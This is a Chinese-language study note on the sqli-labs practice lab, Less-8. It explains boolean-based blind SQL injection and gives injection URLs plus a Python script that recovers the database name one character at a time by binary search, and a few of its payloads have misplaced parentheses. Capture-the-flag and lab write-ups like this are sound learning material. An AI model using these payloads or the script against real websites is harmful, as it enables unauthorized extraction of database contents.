sqli-labs学习记录8

less-8

打开靶场。

输入id=1得到了和前面一样的回显。

通过尝试前面的闭合方式,是'))的闭合方式。

我们输入id=1')).

发现没有报错回显。

这关发现回显就2种方式,一种是有字符回显,一种是啥都没,那根据这样的回显方式我们可以使用布尔盲注的方法。

我们可以通过不断改变范围来查看页面的回显,这样我们最后就可以确定一个值,这样循环操作得到最后的结果。

比如我们可以用length函数和二分法来确定数据库的长度。

?id=1' and (select length(database())>1) and 1=1 --+

正常回显。

我们尝试输入

?id=1' and (select length(database()>8)) and 1=1 --+

显示无回显,下面我们输入

?id=1' and (select length(database()>7)) and 1=1 --+

回显正常,再和前面的作比较,我们>8是无回显,>7有回显,说明就剩8是正确的了。通过这种方法我们就确定了数据库名的长度,也可以通过可以再利用ascii函数+substr函数来修改字符串的范围,判断数据库的各个字符的ASCII的值,来转换为最后的数据库名称。

那么根据这种方法,我们可以写一个py脚本来帮助我们解决这些循环的操作。

python 复制代码
import requests

url = "..."


def inject_database(url):
    name = ''

    for i in range(1, 100):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr((select database()),%d,1)) > %d-- " % (i, mid)
            params = {"id": payload}
            r = requests.get(url, params=params)
            if "You are in..........." in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2

        if mid == 32:
            break
        name = name + chr(mid)
        print(name)


inject_database(url)

可以看到通过上面的脚本就可以轻松的通过布尔盲注的方式来解决。

查询数据库里的表与字段也可以通过写脚本的方式来执行。这里就不做阐述了。

相关推荐
viperrrrrrrrrr74 分钟前
大数据学习(95)-谓词下推
大数据·sql·学习
嘉友12 分钟前
Redis zset数据结构以及时间复杂度总结(源码)
数据结构·数据库·redis·后端
morganmin23 分钟前
(一)MySQL常见疑惑之:select count(*)和select count(1)的区别
数据库·mysql
唔6625 分钟前
flutter 曲线学习 使用第三方插件实现左右滑动
javascript·学习·flutter
haoly19891 小时前
离散数学问题集--问题4.40
学习
深圳厨神1 小时前
mysql对表,数据,索引的操作sql
数据库·sql·mysql
谁家有个大人1 小时前
数据分析问题思考路径
数据库·数据分析
cwtlw1 小时前
java基础知识面试题总结
java·开发语言·学习·面试
小陈又菜1 小时前
MySQL-触发器
数据库·mysql·database·触发器
爱的叹息1 小时前
详解隔离级别(4种),分别用表格展示问题出现的过程及解决办法
数据库·oracle